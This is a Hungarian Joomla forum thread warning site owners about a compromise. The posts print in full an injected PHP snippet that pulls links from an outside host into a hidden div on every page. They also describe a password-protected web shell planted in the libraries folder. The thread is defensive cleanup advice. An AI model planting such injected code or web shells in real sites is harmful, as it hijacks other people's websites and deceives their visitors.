Joomla Fan Club

[joomlafan]

A következőre szeretném mindenki figyelmét felhívni. Ellenőrizze az aktuális sablon index.php fájlját és a végén keressen egy bejegyzést, ami a következő:

Kód: Egész kijelölése

http://zyzzzqio.is-the-boss.com/mapka.txt

Majd utána következik egy kiírás echo kezdéssel.
Ezt a kettő sort mindenki törölje a sablonjából, ha megtalálhatóak!

[joomlafan]

Meg van a teljes kód, ellenőrizzétek:

Kód: Egész kijelölése

<?php
 $links=@file_get_contents('http://zyzzzqio.is-the-boss.com/mapka.txt');
 echo "<div style=\"height: 0pt;width: 0pt;position: absolute;overflow: auto;\">".$links."</div>";
?>

[joomlafan]

Sikerült azonosítani a támadót. A belépéshez egy fájlt helyez el a:

Kód: Egész kijelölése

http://www.xxxxxxx.hu/libraries/joomla/function.php

néven.
Itt egy jelszót kér. Ha megadják a helyes jelszót, akkor a tárhelyhez teljes hozzáférést szerzet és a fájlokkal, könyvtárakkal azt csinál, amit akar.

Támadás a:

Kód: Egész kijelölése

82.47.211.12

címről érkezik. Ip visszakövetve Nagy-Britanniába visz.

Mindenki ellenőrizze! Főleg úgy, hogy lehet rejtett fájl!